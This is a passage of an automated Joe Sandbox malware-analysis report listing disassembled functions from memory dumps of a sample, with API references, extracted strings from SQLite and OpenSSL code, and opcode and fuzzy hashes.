Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: H
API String ID: 2142204133-2852464175
Opcode ID: cfbeda1bf99951151eff030447c4d7a4d5e89bf1fbf00df94b65fd72b816f457
Instruction ID: 032fd7f1e87021bd662f67d24f787d4f3836f8ff3b9abbbdc60276d4a8de8986
Opcode Fuzzy Hash: cfbeda1bf99951151eff030447c4d7a4d5e89bf1fbf00df94b65fd72b816f457
Instruction Fuzzy Hash: 7E919267F1A64A85EB248E15A460B7977A0FB45BD8F184634DEBD47BE8CF3CE4508B00

Function 00007FF6BA3BFBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3BFEA7

Part of subcall function 00007FF6BA3B7A3C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B7A59

Strings

UTF-8, xrefs: 00007FF6BA3BFE26
UTF-16LEUNICODE, xrefs: 00007FF6BA3BFE45
ccs, xrefs: 00007FF6BA3BFDE2

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction ID: 1ba2870bf5cba99e8c96209f0761cb7b2f28a72f8d294bf50bcb638b8548fbcd
Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction Fuzzy Hash: 1181AF72E08A4385F7649F2D815027827A2AB11B48FD5A2B9CF09D72D9CF3EE949D301

Function 00007FFDFB1493F0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 198COMMON

Download Yara Rule

Strings

column%d, xrefs: 00007FFDFB1495F8
rowid, xrefs: 00007FFDFB14954E
%s.%s, xrefs: 00007FFDFB14956E

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID: %s.%s$column%d$rowid
API String ID: 0-1505470444
Opcode ID: 30ee24403bbbe39b15dc8828bd75070d7d44f9a04dc3d048d0a1485fb1bb9eaf
Instruction ID: b51d1236c0b3131aadfc5e63cfd8ee352d7296890a6bafd208a6c61a2285a504
Opcode Fuzzy Hash: 30ee24403bbbe39b15dc8828bd75070d7d44f9a04dc3d048d0a1485fb1bb9eaf
Instruction Fuzzy Hash: F291AA22B0AB8289EB20DB15D464BA967A4FB46BE8F444336DA7D473E9DF38D101C300

Function 00007FFDFB0E89A0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 192COMMON

Download Yara Rule

Strings

8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB0E8A4C
database corruption, xrefs: 00007FFDFB0E8A5F
%s at line %d of [%.10s], xrefs: 00007FFDFB0E8A66

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 0-3727861699
Opcode ID: ac59a9cb4a734ac58b84e693e8c4ebf4f1f7077b93233f305f08416909222bbb
Instruction ID: f5bacd77d610eee3107464b056a7cb5862adfa5cb139a75e03a5bf5dc41c2899
Opcode Fuzzy Hash: ac59a9cb4a734ac58b84e693e8c4ebf4f1f7077b93233f305f08416909222bbb
Instruction Fuzzy Hash: 4581E762B0A6C28AE7548B25D1A4E7E7BA0FB427C4F084132DBAD476E9CF3CE455D740

Function 00007FFDFB123E60 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB12408E

Strings

, , xrefs: 00007FFDFB123F1E
, xrefs: 00007FFDFB123F3D
CREATE TABLE , xrefs: 00007FFDFB123F7F

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: $, $CREATE TABLE
API String ID: 2142204133-3459038510
Opcode ID: 1d4661e5c2f4c2fad4983aac1168277e3abe20b263b925f6ae71bccaca4e2b92
Instruction ID: 8b13f7088890bc0e542e3d103ada154cc2240d3399fd67006b12b180943f5f07
Opcode Fuzzy Hash: 1d4661e5c2f4c2fad4983aac1168277e3abe20b263b925f6ae71bccaca4e2b92
Instruction Fuzzy Hash: AF61E563F0A5828ADB258F14A4506B9B7A2FB44BA8F484335DE6D476E9DF3DD446C300

Function 00007FFDFAADF070 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDFAADF127

Strings

SSL_SESSION_new, xrefs: 00007FFDFAADF0D0, 00007FFDFAADF18E
ssl_get_new_session, xrefs: 00007FFDFAADF1D2, 00007FFDFAADF30A
..\s\ssl\ssl_sess.c, xrefs: 00007FFDFAADF0B2, 00007FFDFAADF0DC, 00007FFDFAADF19A, 00007FFDFAADF1BE, 00007FFDFAADF1DE, 00007FFDFAADF316

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
API String ID: 3568877910-2527649602
Opcode ID: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
Instruction ID: 5852a95550ca242d76d75b1297e81e40f60e737c007a576ba1c867f3f16c7ee8
Opcode Fuzzy Hash: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
Instruction Fuzzy Hash: D2719C21B08A8282EB589B65D864BBD3390FB84B84F884176DE7D477DEDF3CE5468310

Function 00007FFDFAAB2469 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON

Download Yara Rule

APIs

00007FFE13341250.VCRUNTIME140 ref: 00007FFDFAB0D776

Strings

tls_parse_ctos_server_name, xrefs: 00007FFDFAB0D729, 00007FFDFAB0D785, 00007FFDFAB0D7F6, 00007FFDFAB0D823, 00007FFDFAB0D868
D:\a\1\s\include\internal/packet.h, xrefs: 00007FFDFAB0D7AE, 00007FFDFAB0D7CF
..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FFDFAB0D735, 00007FFDFAB0D79A, 00007FFDFAB0D802, 00007FFDFAB0D82F, 00007FFDFAB0D874

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13341250
String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
API String ID: 2991499524-4157686371
Opcode ID: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
Instruction ID: 8e4ba7b326484c4783ab813d9c397357c4a90e675178bb7d29e86589870e6801
Opcode Fuzzy Hash: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
Instruction Fuzzy Hash: 8E61E621F0C69285F7699F61D420FB96790EF45B84FC881B2DD6D47ADEDE2CE6808710

Function 00007FF6BA3AD648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6BA3AD673
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6BA3AD70A
RtlUnwindEx.KERNEL32 ref: 00007FF6BA3AD764

Strings

csm, xrefs: 00007FF6BA3AD6F1

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction ID: e3afcafc8bb1c0cd91d7c4ac4f652bd2a6c99ed13ec28fbad4727f73886df184
Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction Fuzzy Hash: 01517A26A196628ADF188F19E444B7C63A6EB44BD8F108175EF4EC7788EF7DE841C700

Function 00007FFDFB0E8CA0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 152COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0E8D27

Strings

8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB0E8EA9
database corruption, xrefs: 00007FFDFB0E8EB5
%s at line %d of [%.10s], xrefs: 00007FFDFB0E8EC1

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 2142204133-3727861699
Opcode ID: 75da13944be0d2eaaf71d09a02690a791e9ea79b5304e52c345f89a23cfe710d
Instruction ID: be6e5b5b5297203e4e62bb3c948e94cdf5b58d2935225409484876feb831992a
Opcode Fuzzy Hash: 75da13944be0d2eaaf71d09a02690a791e9ea79b5304e52c345f89a23cfe710d
Instruction Fuzzy Hash: 1751DF73709BC1C5CB10CB19E4A49AEBB65F755B84F55813AEAAE037A8DB3CD045C700

Function 00007FF6BA3AF288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6BA3AF2B0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6BA3AF398

Strings

csm, xrefs: 00007FF6BA3AF3EA
csm, xrefs: 00007FF6BA3AF2D2

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction ID: 2a3570806b04aeab73f2e69d670d3739fe0c39ef30192ff4d76e1e99d8ce88e9
Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction Fuzzy Hash: 0C518E32A086A28AEF748B29D04526C77A2EB54B84F1481B6EF8DC7BD5CF3DE454C701

Function 00007FF6BA3AEED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6BA3AEF37
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6BA3AEF83

Strings

RCC, xrefs: 00007FF6BA3AEF53
MOC, xrefs: 00007FF6BA3AEF4B

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction ID: 6c9147d962ba8ae164ee0ea4d38bc82be3823770e0fbe3674d08b2fc712afde7
Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction Fuzzy Hash: DF617F32908BD586EB709B19E4403AEB7A1FB85B94F144265EF9C83B99DF7CD194CB00

Function 00007FFDFB0C8417 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0C84C8
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0C854E

Strings

(join-%u), xrefs: 00007FFDFB0C8559
(subquery-%u), xrefs: 00007FFDFB0C8570

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: (join-%u)$(subquery-%u)
API String ID: 2142204133-2916047017
Opcode ID: e4b271abe33ea453b0af829f0d0b3c64b2499140cc847aae9644bee38be7c82c
Instruction ID: 1cab4e7206d5b2d72170653677629db325f2367e82257442cd1c2f89d4db29cc
Opcode Fuzzy Hash: e4b271abe33ea453b0af829f0d0b3c64b2499140cc847aae9644bee38be7c82c
Instruction Fuzzy Hash: 0251F4B2B1A74385EB608A25D064F3D27A1FB06BA4F564631CA3D072EDDF6CE841E744

Function 00007FFDFA9321E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFA93220A
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFA932228

Strings

HANGUL SYLLABLE , xrefs: 00007FFDFA932200
CJK UNIFIED IDEOGRAPH-, xrefs: 00007FFDFA93221E

Memory Dump Source

Source File: 00000001.00000002.2254958100.00007FFDFA931000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFA930000, based on PE: true

Associated: 00000001.00000002.2254926278.00007FFDFA930000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA97A000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA988000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA9D7000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA9DC000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA9DF000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2255290926.00007FFDFA9E0000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2255326893.00007FFDFA9E2000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfa930000_El9HaBFrFM.jbxd

Similarity

API ID: 00007B6570
String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
API String ID: 4069847057-87138338
Opcode ID: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
Instruction ID: c9f26e4828c30fc30c9bd188d4692b5bc6f372b7854fcd48b43ca734b0d55e20
Opcode Fuzzy Hash: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
Instruction Fuzzy Hash: 9F41F872B0CB4286E7188F18E854A697765EBA0790F848270EA79C7ADDDF3CD5818B40

Function 00007FFDFB0EFE60 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0EFF93

Strings

-, xrefs: 00007FFDFB0EFF77
%!.15g, xrefs: 00007FFDFB0EFFDC
, xrefs: 00007FFDFB0EFFB2

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: $%!.15g$-
API String ID: 2142204133-875264902
Opcode ID: 312380605faac612b932c0e84749a71c5b5db630570bc0cb0ad3afdeeff4af52
Instruction ID: 5d7b4d774d5f0c79a87d46bb01540964a3971d8a75a252aaa30320a2d7525028
Opcode Fuzzy Hash: 312380605faac612b932c0e84749a71c5b5db630570bc0cb0ad3afdeeff4af52
Instruction Fuzzy Hash: B5412862F1978682F710CB2EE050B6A7B90EB467C4F004125EA9D477A9CB3DD405D700

Function 00007FFDFAAB19DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

00007FFDFAB84D31.LIBCRYPTO-3 ref: 00007FFDFAAF21AB
00007FFDFAB84D31.LIBCRYPTO-3 ref: 00007FFDFAAF21ED
00007FFDFAB84D31.LIBCRYPTO-3 ref: 00007FFDFAAF222F

Strings

..\s\ssl\tls_srp.c, xrefs: 00007FFDFAAF229E, 00007FFDFAAF22B0

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\tls_srp.c
API String ID: 3568877910-1778748169
Opcode ID: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
Instruction ID: 5c6d765547d32f4a3751ea5c11716a805936d5c1efa4885baf5a6cf128dc642c
Opcode Fuzzy Hash: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
Instruction Fuzzy Hash: A1413F21B0AB8380FF5DAF659470BB83390AF41B84F5805B5DE7D4B7CDDF28A41A8214

Function 00007FF6BA3A7E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF6BA3A352C,?,00000000,00007FF6BA3A3F23), ref: 00007FF6BA3A7F32

Strings

%.*s, xrefs: 00007FF6BA3A7EEB
\, xrefs: 00007FF6BA3A7E97
%s%c, xrefs: 00007FF6BA3A7EA4

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
